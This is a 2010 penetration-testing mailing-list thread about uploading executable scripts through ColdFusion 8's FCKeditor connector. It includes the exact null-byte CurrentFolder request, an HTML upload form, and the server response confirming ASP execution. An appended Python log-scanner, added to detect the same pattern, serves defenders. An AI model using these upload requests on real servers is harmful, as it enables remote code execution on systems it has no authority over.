Penetration Testing mailing list archives
Re: ColdFusion 8 w/ FCKEditor
From: The Dead <th3d34d () gmail com>
Date: Wed, 30 Jun 2010 21:54:30 -0300
Hello George,

The trick worked! Thanks!

The request was:

http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?CurrentForder=/shell.asp%00

I got this response from server:

<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/teste.asp�/teste.txt", "teste.txt", "0" );
</script>

So, I could access /userfiles/file/teste.asp and got the asp script executed.

Thanks to all!

On Wed, Jun 30, 2010 at 8:42 PM, George A. Theall <theall () tifaware com> wrote:
> On Wed, Jun 30, 2010 at 05:59:04PM -0300, The Dead wrote:
>
> > I got two servers with this condition. In one of the servers, CFM files
> > were allowed to be uploaded as ASP and others. It was simple to upload
> > to the server using a HTML based form as:
> >
> > <html>
> > <form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?" method="post" enctype="multipart/form-data">
> > <input type="file" name="NewFile"></input>
> > <input type="submit">
> > </form>
> >
> > In another server, CFM extensions and others like ASP, PHP are not
> > allowed to be uploaded. So, I'm trying something to solve this case.
>
> The trick is to pass the name of the destination file through the
> 'CurrentFolder' parameter and follow it by a NULL byte, use an innocuous
> file name for 'NewFile', and include CFM code as the contents. I suppose
> you might be able to substitute ASP code or something else, but you
> _know_ the server supports ColdFusion scripts.
>
> George
> --
> theall () tifaware com
>
> ------------------------------------------------------------------------
> This list is sponsored by: Information Assurance Certification Review Board
>
> Prove to peers and potential employers without a doubt that you can
> actually do a proper penetration test. IACRB CPT and CEPT certs require
> a full practical examination in order to become certified.
>
> http://www.iacertification.org
> ------------------------------------------------------------------------
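For defenders reviewing web logs for the request pattern discussed in this thread, the following detection sketch is an added example and is not part of either poster's message. It assumes Apache-style access log lines; the sample lines are constructed, and the function names are hypothetical. It inspects every query parameter sent to the FCKeditor file manager instead of relying on one parameter name, and it decodes repeatedly so a double-encoded NUL (`%2500`) is also caught.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (assumed Apache-style format, not from the thread).
SAMPLE_LOG = """\
198.51.100.7 - - [30/Jun/2010:21:40:01 -0300] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?CurrentFolder=/ HTTP/1.1" 200 187
198.51.100.7 - - [30/Jun/2010:21:41:12 -0300] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?CurrentFolder=/x.asp%00 HTTP/1.1" 200 201
198.51.100.7 - - [30/Jun/2010:21:42:30 -0300] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?CurrentFolder=/x.cfm%2500 HTTP/1.1" 200 201
203.0.113.9 - - [30/Jun/2010:21:43:02 -0300] "GET /index.cfm?page=home HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
CONNECTOR_RE = re.compile(r"/fckeditor/editor/filemanager/", re.I)
# A folder-like value that ends in a server-side script extension (optionally NUL-terminated).
SCRIPT_EXT_RE = re.compile(rb"\.(?:cfm|cfml|cfc|asp|aspx|php|jsp)\x00?$", re.I)

def decode_fully(raw, rounds=3):
    """Percent-decode several times so %2500 (double-encoded NUL) is also seen."""
    data = raw.encode("latin-1", "replace")
    for _ in range(rounds):
        data = unquote_to_bytes(data)
    return data

def findings_for(target):
    """Return the reasons a request target looks like the upload bypass (hypothetical helper)."""
    parts = urlsplit(target)
    if not CONNECTOR_RE.search(parts.path):
        return []
    reasons = []
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        value = decode_fully(value)
        if b"\x00" in value:
            reasons.append(f"NUL byte in parameter {name!r}")
        if SCRIPT_EXT_RE.search(value.rstrip(b"/")):
            reasons.append(f"script extension in parameter {name!r}")
    return reasons

def scan(log_text):
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m and (reasons := findings_for(m.group(1))):
            hits.append((lineno, reasons))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit on the connector path is worth correlating with newly created files under the upload directory whose names end in a script extension.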